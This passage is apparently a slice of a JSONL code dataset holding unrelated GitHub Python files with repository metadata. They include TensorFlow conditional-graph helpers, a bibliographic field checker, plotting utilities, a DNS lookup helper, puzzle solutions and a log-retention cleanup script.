new_false_inputs = (_create_dummy_params(false_graph, true_params)\n + false_params)\n return new_true_params, new_false_inputs\n\n\ndef _make_inputs_match(true_graph, false_graph, true_inputs, false_inputs):\n \"\"\"Modifies true_graph and false_graph so they have the same input signature.\n\n This method reorders and/or adds parameters to true_graph and false_graph so\n they have the same input signature, and updates the 'inputs', 'extra_inputs',\n and '_captured' fields of both graphs accordingly. It uses the input tensors\n from the outer graph to avoid duplicating shared arguments.\n\n Args:\n true_graph: function._FuncGraph\n false_graph: function._FuncGraph\n true_inputs: a list of Tensors in the outer graph. The inputs for\n true_graph.\n false_inputs: a list of Tensors in the outer graph. The inputs for\n false_graph.\n\n Returns:\n A new list of Tensors from the outer graph that are the new inputs for both\n true_graph and false_graph. This is a deduped version of true_inputs +\n false_inputs.\n \"\"\"\n shared_inputs, true_only_inputs, false_only_inputs = _separate_unique_inputs(\n true_inputs, false_inputs)\n\n new_inputs = shared_inputs + true_only_inputs + false_only_inputs\n\n true_input_to_param = dict(zip(true_inputs, true_graph.inputs))\n false_input_to_param = dict(zip(false_inputs, false_graph.inputs))\n\n true_graph.inputs = (\n [true_input_to_param[t] for t in shared_inputs] +\n [true_input_to_param[t] for t in true_only_inputs] +\n _create_dummy_params(true_graph, false_only_inputs))\n\n false_graph.inputs = (\n [false_input_to_param[t] for t in shared_inputs] +\n _create_dummy_params(false_graph, true_only_inputs) +\n [false_input_to_param[t] for t in false_only_inputs])\n\n # Rewrite the _FuncGraphs' state to reflect the new inputs.\n true_graph.extra_inputs = new_inputs\n false_graph.extra_inputs = new_inputs\n\n true_graph._captured = dict(zip(new_inputs, true_graph.inputs))\n false_graph._captured = dict(zip(new_inputs, false_graph.inputs))\n\n return new_inputs\n\n\ndef _create_dummy_params(func_graph, template_tensors):\n \"\"\"Creates tensors in func_graph to represent template_tensors.\n\n Args:\n func_graph: function._FuncGraph.\n template_tensors: a list of tensors in the outer graph.\n\n Returns:\n A list of tensors in func_graph.\n \"\"\"\n with func_graph.as_default():\n return [gen_functional_ops.fake_param(dtype=t.dtype, shape=t.shape)\n for t in template_tensors]\n\n\ndef _get_grad_fn_name(func_graph):\n \"\"\"Returns a unique name to use for the grad function of `func_graph`.\"\"\"\n name = \"%s_grad\" % func_graph.name\n\n base_name = name\n counter = 1\n if ops.get_default_graph()._is_function(name):\n name = \"%s_%s\" % (base_name, counter)\n counter += 1\n\n return name\n\n\ndef _check_same_outputs(true_graph, false_graph):\n \"\"\"Raises an error if true_graph and false_graph have different outputs.\"\"\"\n true_output_types = [t.dtype for t in true_graph.outputs]\n false_output_types = [t.dtype for t in false_graph.outputs]\n if (len(true_graph.outputs) != len(false_graph.outputs) or\n true_output_types != false_output_types):\n raise ValueError(\n \"true_fn() and false_fn() must return the same number and type of \"\n \"arguments, got:\\n\"\n \" true_fn: %s\\n\"\n \" false_fn: %s\" % (true_output_types, false_output_types))\n","repo_name":"zylo117/tensorflow-gpu-macosx","sub_path":"tensorflow/tensorflow/python/ops/cond_v2_impl.py","file_name":"cond_v2_impl.py","file_ext":"py","file_size_in_byte":17067,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"65"} +{"seq_id":"16627967604","text":"#! /usr/bin/env python\n\"\"\"Checker for fields that are inconsistent with the ENTRYTYPE.\"\"\"\nfrom __future__ import annotations\n\nimport colrev.qm.quality_model\nfrom colrev.constants import DefectCodes\nfrom colrev.constants import Fields\n\n# pylint: disable=too-few-public-methods\n\n\nclass InconsistentWithEntrytypeChecker:\n \"\"\"The InconsistentWithEntrytypeChecker\"\"\"\n\n record_field_inconsistencies: dict[str, list[str]] = {\n \"article\": [Fields.BOOKTITLE, Fields.ISBN],\n \"inproceedings\": [\"issue\", Fields.NUMBER, Fields.JOURNAL],\n \"incollection\": [],\n \"inbook\": [Fields.JOURNAL],\n \"book\": [\"issue\", Fields.NUMBER, Fields.JOURNAL],\n \"phdthesis\": [\n Fields.VOLUME,\n \"issue\",\n Fields.NUMBER,\n Fields.JOURNAL,\n Fields.BOOKTITLE,\n Fields.ISBN,\n ],\n \"masterthesis\": [\n Fields.VOLUME,\n \"issue\",\n Fields.NUMBER,\n Fields.JOURNAL,\n Fields.BOOKTITLE,\n Fields.ISBN,\n ],\n \"techreport\": [\n Fields.VOLUME,\n \"issue\",\n Fields.NUMBER,\n Fields.JOURNAL,\n Fields.BOOKTITLE,\n Fields.ISBN,\n ],\n \"unpublished\": [\n Fields.VOLUME,\n \"issue\",\n Fields.NUMBER,\n Fields.JOURNAL,\n Fields.BOOKTITLE,\n Fields.ISBN,\n ],\n \"online\": [Fields.JOURNAL, Fields.BOOKTITLE, Fields.ISBN],\n \"misc\": [Fields.JOURNAL, Fields.BOOKTITLE, Fields.ISBN],\n }\n \"\"\"Fields considered inconsistent with the respective ENTRYTYPE\"\"\"\n\n msg = DefectCodes.INCONSISTENT_WITH_ENTRYTYPE\n\n def __init__(self, quality_model: colrev.qm.quality_model.QualityModel) -> None:\n self.quality_model = quality_model\n\n def run(self, *, record: colrev.record.Record) -> None:\n \"\"\"Run the completeness checks\"\"\"\n\n if record.data[\"ENTRYTYPE\"] not in self.record_field_inconsistencies:\n return\n\n inconsistent_fields = self.record_field_inconsistencies[\n record.data[\"ENTRYTYPE\"]\n ]\n for key in record.data:\n if key in inconsistent_fields:\n record.add_masterdata_provenance_note(key=key, note=self.msg)\n else:\n record.remove_masterdata_provenance_note(key=key, note=self.msg)\n\n\ndef register(quality_model: colrev.qm.quality_model.QualityModel) -> None:\n \"\"\"Register the checker\"\"\"\n quality_model.register_checker(InconsistentWithEntrytypeChecker(quality_model))\n","repo_name":"CoLRev-Environment/colrev","sub_path":"colrev/qm/checkers/inconsistent_with_entrytype.py","file_name":"inconsistent_with_entrytype.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"65"} +{"seq_id":"13878147456","text":"import os\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\n\n\nclass envLoader:\n def __init__(self):\n self.base = self.dir_name(3)\n \n \n def dir_name(n):\n path = os.path.abspath(__file__)\n for _ in range(n): path = os.path.dirname(path)\n return path\n \n\n def get_path(self, env):\n env_path = os.getenv(env)\n return os.path.join(self.base, env_path) if os.getenv(env) else None\n \n\n def path(self):\n get = self.get_path\n path = {\n 'csvs': get('csvs_path'),\n 'date': get('date_path'),\n 'syms': get('syms_path'),\n 'syms_lnth_path': get('syms_lnth_path'),\n 'data': get('data_path'),\n 'logs': get('logs_path'),\n 'prep': get('prep_path'),\n 'pred': get('pred_path'),\n 'test': get('test_path'),\n 'train': get('train_path'),\n 'result': get('result_path')\n }\n return path","repo_name":"bee85919/pred-stock-with-gru","sub_path":"src/Utils/envLoader.py","file_name":"envLoader.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"22738108995","text":"import numpy as np\nimport pandas as pd\nimport openpyxl\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n\n# Reading and Cleaning Data from Excel File\nURL = 'https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DV0101EN-SkillsNetwork/Data%20Files/Canada.xlsx'\ndf = pd.read_excel(\n URL,\n sheet_name='Canada by Citizenship',\n skiprows=range(20),\n skipfooter=2)\nprint('Data downloaded and read into a dataframe!')\npd.set_option('expand_frame_repr', None)\ndf.drop(['AREA', 'REG', 'DEV', 'Type', 'Coverage'], axis=1, inplace=True)\nprint(df.head())\ndf.rename(columns={'OdName':'Country', 'AreaName':'Continent','RegName':'Region'}, inplace=True)\nprint(df.head())\ndf.set_index('Country',inplace=True)\nprint(df.head())\nprint(df.loc['Morocco',:])\n# add total immigrants per country\ndf['Total'] = df.sum(axis=1)\nprint(df)\n# Plotting the top 10 countries with immigrants to Canada using a stacked Area plot\nYears=list(range(1980,2014))\nprint(Years)\ndf.sort_values(['Total'],ascending=False,inplace=True)\nprint(df.head(10))\ndf_sort=df.head(10)\ndf_sort=df_sort[Years].transpose()\nprint(df_sort)\n#df_sort.index=df_sort.index.map(int)\nprint(df_sort)\ndf_sort.plot(kind='area',figsize=(20,10))\nplt.title('Immigration Trend of Top 10 Countries')\nplt.ylabel('Number of Immigrants')\nplt.xlabel('Years')\nplt.show()\n# Plotting the least 10 countries with immigrants to Canada using a stacked Area plot\nYears_least=list(range(1980,2014))\nprint(Years_least)\ndf.sort_values(['Total'],ascending=True,inplace=True)\nprint(df.head(10))\ndf_sort_least=df.head(10)\ndf_sort_least=df_sort_least[Years].transpose()\nprint(df_sort_least)\n#df_sort.index=df_sort.index.map(int)\nprint(df_sort_least)\ndf_sort_least.plot(kind='area',figsize=(20,10))\nplt.title('Immigration Trend of Least 10 Countries')\nplt.ylabel('Number of Immigrants')\nplt.xlabel('Years')\nplt.show()","repo_name":"Zidev97/Canada-Immigration-Analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43941455571","text":"################################\n# Information about extraction #\n################################\n\n# Dictionary with lists of which columns to get for each table\nEXTRACT_DICT = {\n 'AboReg': ['RowKey', 'CustId', 'Name', 'Department', 'Addr2'],\n 'ElmOwner': ['RowKey', 'Owner', 'Name', 'Email', 'Type'],\n 'EndReg': ['RowKey', 'End', 'EqLinkToPt', 'IsEquipm'],\n 'KabReg': ['RowKey', 'Cable', 'End_A', 'End_B', 'Owner', 'RemarkM'],\n 'KabTer': ['RowKey', 'Cable', 'IsEnd_A', 'FromCore', 'End', 'IsDraft'],\n 'KuSbLink': ['RowKey', 'CustId', 'Circuit'],\n 'LedRut': ['RowKey', 'Cable', 'Core', 'Circuit', 'Wire', 'Remark'],\n 'SbReg': ['RowKey', 'Circuit', 'Type', 'Speed', 'Reference', 'Owner'],\n 'UtsTilk': ['RowKey', 'Pin', 'Port', 'End', 'Circuit', 'Wire'],\n 'UtsTlf': ['RowKey', 'Circuit', 'Parallel', 'End'],\n 'UtsUtg': ['RowKey', 'End', 'Port', 'Label', 'Remark', 'Type'],\n }\n\n# Single-column primary key for each table\nPREVIOUS_REGULAR_PRIMARY_KEYS = {\n}\n\n# Composite primary key for each table\nPREVIOUS_COMPOSITE_PRIMARY_KEYS = {\n 'UtsUtg': ('Port', 'End')\n}\n\n# List of single-column foreign keys associated with each table\nREGULAR_FOREIGN_KEYS = {\n 'EndReg': ['EqLinkToPt'],\n 'KabReg': ['End_A', 'End_B'],\n 'KabTer': ['Cable', 'End'],\n 'LedRut': ['Cable', 'Circuit'],\n 'UtsTilk': ['Circuit'],\n 'UtsTlf': ['Circuit', 'End'],\n 'UtsUtg': ['End'],\n }\n\n# Mapping from column name to which model to use as foreign key\nCOLUMN_TO_OBJECT = {\n 'Cable': 'Cable',\n 'Circuit': 'Circuit',\n 'End': 'End',\n 'End_A': 'End',\n 'End_B': 'End',\n 'EqLinkToPt': 'End',\n}\n\n# List of composite foreign keys associated with each table\nCOMPOSITE_FOREIGN_KEYS = {\n 'UtsTilk': ['Port', 'End'],\n}\n\n# List of tables to be renamed with the new name\nNEW_TABLE_NAMES = {\n 'AboReg': 'customer',\n 'ElmOwner': 'owner',\n 'EndReg': 'end',\n 'KabReg': 'cable',\n 'KabTer': 'termination',\n 'KuSbLink': 'customer_circuit',\n 'LedRut': 'routing_cable',\n 'SbReg': 'circuit',\n 'UtsTilk': 'connection',\n 'UtsTlf': 'circuit_end',\n 'UtsUtg': 'port',\n}\n\n# Dict of new column names\nNEW_COLUMN_NAMES = {\n 'Addr2': 'address',\n 'Cable': 'cable',\n 'Circuit': 'circuit',\n 'Core': 'core',\n 'CustId': 'customer',\n 'Department': 'department',\n 'Email': 'email',\n 'End': 'end',\n 'End_A': 'end_a',\n 'End_B': 'end_b',\n 'EqLinkToPt': 'room',\n 'FromCore': 'from_core',\n 'IsDraft': 'is_draft',\n 'IsEnd_A': 'is_end_a',\n 'IsEquipm': 'is_equipment',\n 'Label': 'label',\n 'Name': 'name',\n 'Owner': 'owner',\n 'Pin': 'pin',\n 'Port': 'port',\n 'Parallel': 'parallel',\n 'Reference': 'alias',\n 'Remark': 'remark',\n 'RemarkM': 'comment',\n 'RowKey': 'id',\n 'Speed': 'speed',\n 'Type': 'type',\n 'Wire': 'wire',\n}\n\n# List of columns to be lowercased\nLOWERCASE_OBJECTS = ['End', 'Reference']\n\nSCHEMA = 'telemator'\n","repo_name":"Uninett/telemator-NAV-integrasjon","sub_path":"telemator_export/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"7137435166","text":"def MergeSort(arr):\n MergeSort2(arr, 0, len(arr)-1 )\n return arr\n\ndef MergeSort2(arr, first, last):\n if first= mat[a+1][b]:\n q.append((a+1,b,di+1))\n if b + 1 <= N-1 and ss >= mat[a][b+1]:\n q.append((a,b+1,di+1))\n if a - 1 >= 0 and ss >= mat[a-1][b]:\n q.append((a-1,b,di+1))\n if b - 1 >= 0 and ss >= mat[a][b-1]:\n q.append((a,b-1,di+1))\n\n if di == 0 :\n visit[a][b] = di+1\n else:\n visit[a][b] = di\n if ff == 1:\n distance = di\n else:\n distance = -1\n return distance\n\na,b = pos\nkkk = []\nvisit = copy.deepcopy(visit_t)\nfor i in range(len(tttt)):\n aa,bb=tttt[i]\n dis = find(mat, shark, a, b, aa, bb,visit)\n if dis > 0:\n kkk.append((dis,aa,bb))\naaa = bbb = -1\nkkk = sorted(kkk)\nif kkk:\n ccc,aaa,bbb = kkk[0]\nif aaa is not -1:\n fi.append((aaa,bbb))\n\nres = 0\ndef func(mat,r,c):\n global shark,res\n\n cnt = 0\n ccccc = 0\n while(fi):\n #print(fi)\n a, b = fi.popleft()\n flag = 0\n for i in range(N):\n for j in range(N):\n if shark - 1 >= mat[i][j] and mat[i][j] is not 0:\n flag = 1\n break\n\n if flag == 0:\n break\n #print(mat, shark, r, c, a, b,res)\n visit = copy.deepcopy(visit_t)\n ddd = find(mat, shark, r, c, a, b,visit)\n if ddd == -1:\n continue\n mat[a][b] = 0\n r = a\n c = b\n res += ddd\n cnt += 1\n if shark == cnt:\n shark += 1\n cnt = 0\n\n ttt=[]\n for i in range(N):\n for j in range(N):\n if shark-1 >= mat[i][j] and mat[i][j] is not 0:\n ttt.append((i,j))\n #print(ttt)\n kkk = []\n di = 0\n visit = copy.deepcopy(visit_t)\n for i in range(len(ttt)):\n aa,bb=ttt[i]\n di = find(mat, shark, r, c, aa, bb,visit)\n if di > 0:\n kkk.append((di,aa,bb))\n #print(kkk)\n kkk = sorted(kkk)\n #print(kkk)\n aaa = bbb = -1\n if kkk:\n ccc, aaa, bbb = kkk[0]\n if aaa == -1:\n continue\n fi.append((aaa,bbb))\nr,c = pos\nmat[r][c] = 0\nfunc(mat,r,c)\nprint(res)\n","repo_name":"JoungChanYoung/algorithm","sub_path":"baekjoon/OldSource/16236_아기상어.py","file_name":"16236_아기상어.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"15450188901","text":"# pylint: disable=invalid-name\nimport socket\nimport dns.resolver\nimport dns.reversename\n\n\ndef dns_query(qname, field):\n dns_answers = None\n dns_error = None\n try:\n dns_answers = dns.resolver.query(qname, field)\n except dns.resolver.NXDOMAIN:\n # ignore: The DNS query name does not exist.\n dns_answers = None\n dns_error = None\n except dns.resolver.NoAnswer:\n # ignore: The DNS response does not contain an answer to the question.\n dns_answers = None\n dns_error = None\n except dns.resolver.NoNameservers:\n # All nameservers failed to answer the query.\n # dns_error='No non-broken nameservers are available to answer the question'\n dns_answers = None\n dns_error = None\n except dns.exception.Timeout:\n # The DNS operation timed out.\n dns_answers = None\n dns_error = 'Timeout'\n except dns.resolver.YXDOMAIN:\n # The DNS query name is too long after DNAME substitution.\n dns_answers = None\n dns_error = 'Timeout after DNAME substitution'\n except Exception as ex:\n dns_answers = None\n dns_error = str(ex)\n return dns_answers, dns_error\n\n\ndef dns_query_field(host: str, field: str):\n dns_answers, dns_error = dns_query(host, field)\n return list(map(str, dns_answers or [])), dns_error\n\n\ndef get_info(host: str):\n result = {}\n for field_type in ['A', 'AAAA']:\n addresses, error = dns_query_field(host, field_type)\n result[field_type]=(addresses, error)\n return result\n","repo_name":"dalf/dnssecaudit","sub_path":"dnssecaudit/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"9089135073","text":"class User:\t\t# here's what we have so far\n def __init__(self, name, email):\n self.name = name\n self.email = email\n self.account_balance = 0\n # adding the deposit method\n def make_deposit(self, amount):\t# takes an argument that is the amount of the deposit\n \tself.account_balance += amount\t# the spec\n \n\nguido = User('guido', 'email')\nguido.account_balance = 500\n\nguido.make_deposit(100)\nguido.make_deposit(200)\n\nprint(guido.account_balance)\t# output: 300\n\t# output: 50\n\n","repo_name":"Kevin2422/Python-flask","sub_path":"fundamentals/oop/usertest.py","file_name":"usertest.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"24842918251","text":"# V0.5\n\ntry:\n import pandas as pd\n import matplotlib.pyplot as plt\n import seaborn as sns\n\nexcept ImportError:\n raise ImportError(\n \"quickPlots require pandas, matplotlib, and seaborn to be installed\") from None\n\n\ndef countplot(data1, column, x=6, y=6, palette=\"d\", xlabel_name=None, ylabel_name=None,\n xlabel_size=16, ylabel_size=16, xticks_size=14, yticks_size=14, orientation='x',\n hue=None, save_name=None, folder_path='Plots/', dpi=500, legend_size=5,\n legend_loc='upper right', order=None, yrange_min=None, yrange_max=None, xrange_min=None,\n xrange_max=None):\n\n with plt.style.context('seaborn-whitegrid'):\n f, ax = plt.subplots(figsize=(x, y))\n\n '''\n Order Parameter:\n\n None (default) => default behavior\n 'a' => ascending\n 'd' => descending\n '[]' => pass a list for custom order.\n '''\n\n if order == 'a':\n order = list(data1[column].value_counts(ascending=True).index)\n elif order == 'd':\n order = list(data1[column].value_counts(ascending=False).index)\n\n if orientation.lower() == 'y':\n # When hue is present, we don't want to have palette colours.\n if hue == None:\n p1 = sns.countplot(y=column, data=data1, palette=(\n 'Blues_'+palette), order=order)\n else:\n p1 = sns.countplot(y=column, data=data1, hue=hue, order=order)\n\n plt.xlabel(xlabel_name or 'Count', size=xlabel_size)\n plt.ylabel(ylabel_name or column.title(), size=ylabel_size)\n else:\n if hue == None:\n p1 = sns.countplot(x=column, data=data1, palette=(\n 'Blues_'+palette), order=order)\n else:\n p1 = sns.countplot(x=column, data=data1, hue=hue, order=order)\n\n plt.xlabel(xlabel_name or column.title(), size=xlabel_size)\n plt.ylabel(ylabel_name or 'Count', size=ylabel_size)\n\n if hue != None:\n ax.legend(data1[column].unique(), loc=legend_loc,\n prop={'size': legend_size})\n\n plt.xticks(size=xticks_size)\n plt.yticks(size=yticks_size)\n\n if xrange_min != None:\n plt.xlim(xrange_min, xrange_max)\n\n if yrange_min != None:\n plt.ylim(yrange_min, yrange_max)\n\n # UNDER CONSTRUCTION:\n # Adding % on the top of the bars. Doesn't work when orientation== 'y'.\n #total = len(data1[column])\n # for p in ax.patches:\n #percentage = '{:.1f}%'.format(100 * p.get_height()/total)\n\n #x = p.get_x() + p.get_width() / 2 - 0.05\n #y = p.get_y() + p.get_height()\n #ax.annotate(percentage, (x, y), size = 12)\n\n if save_name != None:\n f.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n\n\ndef pie(data1, column, size=5, exp=None, legend=True, legend_loc='upper right', font_size=14, col_name=None,\n col_size=15, get_colors=False, colors_custom=None, save_name=None, folder_path='Plots/', dpi=500):\n\n # Issue: Fix the current limitation of n categories, here 10. The code fails when there are more than n categories.\n colors = ['#0fbcf9', '#ffc048', '#00d8d6', '#ef5777', '#05c46b',\n '#fa8231', '#fc5c65', '#fed330', '#26de81', '#45aaf2']\n # We can get the existing color codes to control which category gets which color.\n if get_colors == True:\n return colors\n\n with plt.style.context('default'):\n f, ax = plt.subplots(figsize=(size, size))\n\n default_exp = (0.02,)\n col_categories_count = data1[column].nunique()\n explode = exp or default_exp * col_categories_count # to break the pie\n labels = data1[column].unique()\n\n data1[column].value_counts().plot(kind='pie', autopct='%1.1f%%', textprops={'fontsize': font_size},\n colors=colors_custom or colors, explode=explode)\n\n if legend == True:\n ax.legend(labels, loc=legend_loc)\n\n if col_name == None:\n plt.xlabel('')\n plt.ylabel('')\n else:\n plt.ylabel(col_name, size=col_size)\n\n if save_name != None:\n f.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n\n\ndef hist(data1, column, bins=None, bin_size=1, edgecolor='black', median_axvline=False,\n median_name_axvline='Median', median_color_axvline='#fc4f30', mean_axvline=False,\n mean_name_axvline='Average', mean_color_axvline='#EAB543', x=10, y=6, save_name=None, legend_size=12,\n folder_path='Plots/', dpi=500, yrange_min=None, yrange_max=None, xrange_min=None, xrange_max=None,\n xlabel_name=None, ylabel_name=None, xlabel_size=16, ylabel_size=16):\n\n with plt.style.context('seaborn-whitegrid'):\n f, ax = plt.subplots(figsize=(x, y))\n\n col = data1[column]\n bins = bins or list(range(col.min(), col.max() + 1, bin_size))\n\n plt.hist(col, bins=bins, edgecolor=edgecolor)\n #sns.distplot(col, bins= bins, hist_kws=dict(edgecolor= edgecolor, linewidth=2));\n if median_axvline == True:\n plt.axvline(col.median(), color=median_color_axvline,\n label=median_name_axvline)\n plt.legend()\n\n if mean_axvline == True:\n plt.axvline(col.mean(), color=mean_color_axvline,\n label=mean_name_axvline)\n plt.legend()\n\n ax.legend(prop={'size': legend_size})\n\n if xrange_min != None:\n plt.xlim(xrange_min, xrange_max)\n\n if yrange_min != None:\n plt.ylim(yrange_min, yrange_max)\n\n plt.xlabel(xlabel_name or column.title(), size=xlabel_size)\n plt.ylabel(ylabel_name or 'Count', size=ylabel_size)\n\n if save_name != None:\n f.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n\n\ndef heat(data1, x_col=None, y_col=None, type='%', x=6, y=6, xlabel_name=None, xlabel_size=14,\n ylabel_name=None, ylabel_size=14, xticks_size=12, yticks_size=12, save_name=None,\n dpi=500, folder_path='Plots/'):\n\n pivot = pd.pivot_table(data1, index=[y_col], columns=[\n x_col], aggfunc='count', fill_value=0)\n temp = list(data1)\n temp.remove(x_col)\n temp.remove(y_col)\n pivot = pivot[temp[1]]\n\n if type == '%':\n tot_cols = len(data1)\n for col in data1[x_col].unique():\n pivot[col] = pivot[col].apply(lambda x: (x/tot_cols)*100)\n\n with plt.style.context('default'):\n f, ax = plt.subplots(figsize=(x, y))\n\n # Generate a custom diverging colormap\n cmap = sns.color_palette(\"Blues\")\n\n # Draw the heatmap with the mask and correct aspect ratio\n if type == '%':\n ax = sns.heatmap(pivot, cmap=cmap, annot=True,\n fmt='.1f', linewidth=2, square=True)\n else:\n ax = sns.heatmap(pivot, cmap=cmap, annot=True,\n fmt='d', linewidth=2, square=True)\n\n plt.xlabel(xlabel_name or x_col, fontsize=xlabel_size)\n plt.ylabel(ylabel_name or y_col, fontsize=ylabel_size)\n plt.xticks(fontsize=xticks_size, va=\"center\")\n plt.yticks(fontsize=yticks_size, va=\"center\", rotation=0)\n\n if type == '%':\n for t in ax.texts:\n t.set_text(t.get_text() + \" %\")\n\n if save_name != None:\n f.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n\n# Boxplot & Violin plot\ndef bv(data1, cat_col=None, num_col=None, type='b', x=10, y=8, xlabel_name=None, xlabel_size=16,\n ylabel_name=None, ylabel_size=16, xticks_size=14, yticks_size=14, multicol_melt=False,\n save_name=None, dpi=500, folder_path='Plots/', yrange_min=0, yrange_max=None, xrange_min=0,\n xrange_max=None, xinterval=None, yinterval=None):\n\n with plt.style.context('seaborn-whitegrid'):\n f, ax = plt.subplots(figsize=(x, y))\n\n # For multicol_melt, x and y parameters are mandatory. They consist of label names\n if multicol_melt == True:\n data1 = pd.melt(data1)\n data1.columns = [cat_col, num_col]\n\n if type == 'b':\n p1 = sns.boxplot(x=cat_col, y=num_col, data=data1)\n else:\n p1 = sns.violinplot(x=cat_col, y=num_col, data=data1)\n\n if xrange_max != None:\n plt.xlim(xrange_min, xrange_max)\n\n if yrange_max != None:\n plt.ylim(yrange_min, yrange_max)\n\n # setting interval of ticks\n\n # ALTERT: No interval for cat col. It is only for events where x is also a num col.\n if xinterval != None:\n p1.set(xticks=[i for i in range(xrange_min, int(\n xrange_max or max(data[cat_col])) + 1, xinterval)])\n if yinterval != None:\n p1.set(yticks=[i for i in range(yrange_min, int(\n yrange_max or max(data[num_col])) + 1, yinterval)])\n\n return commons(plt, cat_col, num_col, xlabel_name, ylabel_name, xlabel_size, ylabel_size, xticks_size,\n yticks_size, save_name, dpi, folder_path)\n\n\ndef rel(data1, x_col, y_col, xlabel_name=None, xlabel_size=16, ylabel_name=None, ylabel_size=16,\n xticks_size=14, yticks_size=14, save_name=None, dpi=500, folder_path='Plots/',\n height=6, aspect=1, ci=None, kind='line', hue=None, legend=\"brief\", yrange_min=0,\n yrange_max=None, xrange_min=0, xrange_max=None, xinterval=None, yinterval=None):\n '''\n # Legend => \"brief\", \"full\", or False\n # Ci => either a percentage number such as 36.2, 95 etc. or 'sd' (Standard Deviation) or None\n # kind => 'scatter', 'line'\n '''\n\n p1 = None\n with plt.style.context('seaborn-whitegrid'):\n p1 = sns.relplot(x=x_col, y=y_col, data=data1, kind=kind,\n ci=ci, hue=hue, height=height, aspect=aspect)\n\n # Setting range of ticks (without interval specification)\n if xrange_max != None and xinterval == None:\n plt.xlim(xrange_min, xrange_max)\n\n if yrange_max != None and yinterval == None:\n plt.ylim(yrange_min, yrange_max)\n\n # setting interval of ticks\n if xinterval != None:\n p1.set(xticks=[i for i in range(xrange_min, int(\n xrange_max or max(data[x_col])) + 1, xinterval)])\n if yinterval != None:\n p1.set(yticks=[i for i in range(yrange_min, int(\n yrange_max or max(data[y_col])) + 1, yinterval)])\n\n y_col = 'Average ' + y_col\n\n return commons(plt, x_col, y_col, xlabel_name, ylabel_name, xlabel_size, ylabel_size, xticks_size, yticks_size,\n save_name, dpi, folder_path)\n\n\ndef bar(data1, cat_col, num_col, agg='mean', x=6, y=6, xlabel_name=None, xlabel_size=16,\n ylabel_name=None, ylabel_size=16, xticks_size=14, yticks_size=14, yrange_min=0, yrange_max=None,\n yinterval=None, save_name=None, dpi=500, folder_path='Plots/', order=None):\n\n temp = data1.groupby(by=cat_col)[num_col].agg([agg])\n temp = temp.reset_index()\n temp.columns = [cat_col, num_col]\n\n with plt.style.context('seaborn-whitegrid'):\n f, ax = plt.subplots(figsize=(x, y))\n\n if order == None:\n p1 = sns.barplot(x=cat_col, y=num_col, data=temp,\n palette=('Blues_'+'d'))\n else:\n odr = False if order == 'd' else True\n temp.sort_values(by=num_col, ascending=odr, inplace=True)\n temp.reset_index(drop=True, inplace=True)\n p1 = sns.barplot(x=cat_col, y=num_col, data=temp, palette=(\n 'Blues_'+'d'), order=temp[cat_col].values)\n\n temp[num_col].plot(zorder=2, color='red')\n\n import math\n if yrange_min != 0 or yrange_max != None:\n plt.ylim(yrange_min, yrange_max or math.ceil(\n max(temp[num_col]) + temp[num_col].std()))\n\n if yinterval != None:\n p1.set(yticks=[i for i in range(yrange_min, int(\n yrange_max or max(data[num_col])) + 1, yinterval)])\n\n # Note: Impacted by order\n for index, row in temp.iterrows():\n p1.text(row.name, row[num_col], round(\n row[num_col], 2), color='black', ha=\"center\")\n\n if agg == 'mean':\n agg = 'average'\n num_col = agg+' '+num_col\n\n return commons(plt, cat_col, num_col, xlabel_name, ylabel_name, xlabel_size, ylabel_size, xticks_size,\n yticks_size, save_name, dpi, folder_path)\n\n\ndef commons(plt, x_col, y_col, xlabel_name, ylabel_name, xlabel_size, ylabel_size, xticks_size, yticks_size,\n save_name, dpi, folder_path):\n\n plt.xlabel(xlabel_name or x_col.title(), fontsize=xlabel_size)\n plt.ylabel(ylabel_name or y_col.title(), fontsize=ylabel_size)\n plt.xticks(fontsize=xticks_size)\n plt.yticks(fontsize=yticks_size, rotation=0)\n\n if save_name != None:\n plt.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n","repo_name":"Abhilash-Korraprolu/aklib","sub_path":"quickPlots.py","file_name":"quickPlots.py","file_ext":"py","file_size_in_byte":12635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73390187408","text":"import os\nimport datetime\nfrom xml.etree import ElementTree\n\ndef checkFiles(catalogue, wholesalerName):\n os.chdir(os.path.join(catalogue, wholesalerName, 'Connection_register'))\n for filename in os.listdir():\n if (filename.startswith('NAPS_') and filename.endswith('.txt') and \"00_G\" not in filename):\n if (DateToHelpDeleter - int(filename[-14:-6]) > finalDailyRet):\n deleteFile(filename)\n elif (filename.startswith('NAPS_') and filename.endswith('.txt') and \"00_G\" in filename):\n if (DateToHelpDeleter - int(filename[-14:-6]) > finalMonthlyRet):\n deleteFile(filename)\n\ndef deleteFile(fileToDelete):\n logFile.write('Delete: ' + fileToDelete + '\\n')\n os.unlink(fileToDelete)\n\n\n############ main Program ############\n\nftpRootCatalogue = 'C:\\\\Users\\\\przemyslaw.lelewski\\\\Documents\\\\CCC' #ZMIEN 